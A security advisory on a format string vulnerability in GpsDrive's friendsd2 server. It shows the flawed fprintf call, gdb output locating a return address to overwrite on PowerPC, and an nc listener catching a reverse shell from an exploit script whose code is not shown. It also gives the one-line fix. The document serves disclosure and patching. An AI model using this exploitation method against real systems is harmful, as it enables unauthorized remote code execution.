DMA[2005-1104a] - 'GpsDrive friendsd2 format string vulnerability' Author: Kevin Finisterre Vendor: http://www.gpsdrive.cc/ Product: 'GpsDrive' References: http://www.digitalmunition.com/DMA[2005-1104a].txt Description: GpsDrive is a car (bike, ship, plane) navigation system. It can display positioning information provided from a NMEA capable GPS receiver on a zoomable map. Map file autoselecting is done based on the current position and the prefered map scale. All Garmin GPS reveivers with a serial output should be usable, as well as other GPS receivers that support NMEA protocol. GpsDrive was written in C with use of the GTK+ graphic toolkit and it runs on Linux and FreeBSD. With minimal work it is also posisble to run GpsDrive on Windows and on OSX. GpsDrive comes with a server program called friendsd which acts as server for the position of your friends. You see the position of your friends as a car symbol on the map, including the name, time, day of week and the speed of his last connection. A blue arrow shows the last reported direction of your friend. Fritz Ganter has blatantly stated in the man page that "The (friendsd) server was NOT tested for security". Please not that friendsd no longer runs as root since the last round of security patches. kfinisterre:/home/kfinisterre# friendsd2 server: please don't run me as root The friendsd server does contain an obvious format string issue complements of a bad fprintf() call. ./src/friendsd.c:367: fprintf (stderr, txt); Exploitation of this bug is fairly trivial, on powerpc I chose to overwrite a saved return address as shown below. First I just crashed the program and went to frame 2 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 (gdb) bt #0 0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6 #1 0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6 #2 0x0f6825d0 in fprintf () from /lib/tls/libc.so.6 #3 0x100024b8 in dg_echo () #4 0x10002f28 in main () Next I grab the address of Arglist for frame 2 and overwrite that +4 (gdb) i f Stack level 2, frame at 0x7fffad70: pc = 0xf6825d0 in fprintf; saved pc 0x100024b8 called by frame at 0x7fffae00, caller of frame at 0x7fff8700 Arglist at 0x7fffad70, args: Locals at 0x7fffad70, Previous frame's sp in r1 (gdb) x/a 0x7fffad70+4 0x7fffad74: 0xf6825d0 (overwrite this) animosity:/home/kfinisterre$ nc -l -p 31337 -vvv listening on [any] 31337 ... animosity:/home/kfinisterre$ ./gpsdrive-ex-long-ppc.pl $VAR1 = {}; 192.168.1.1: inverse host lookup failed: Unknown host connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349 id; uid=1000(kfinisterre) gid=1000(kfinisterre) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre) Workaround: Stop using friendsd2! or simply change the above mentioned fprintf() call to the following. fprintf (stderr,"%s",txt); Timeline associated with this bug: I emailed Fritz Ganter (ganter@ganter.at) at least twice about this and got no response. -KF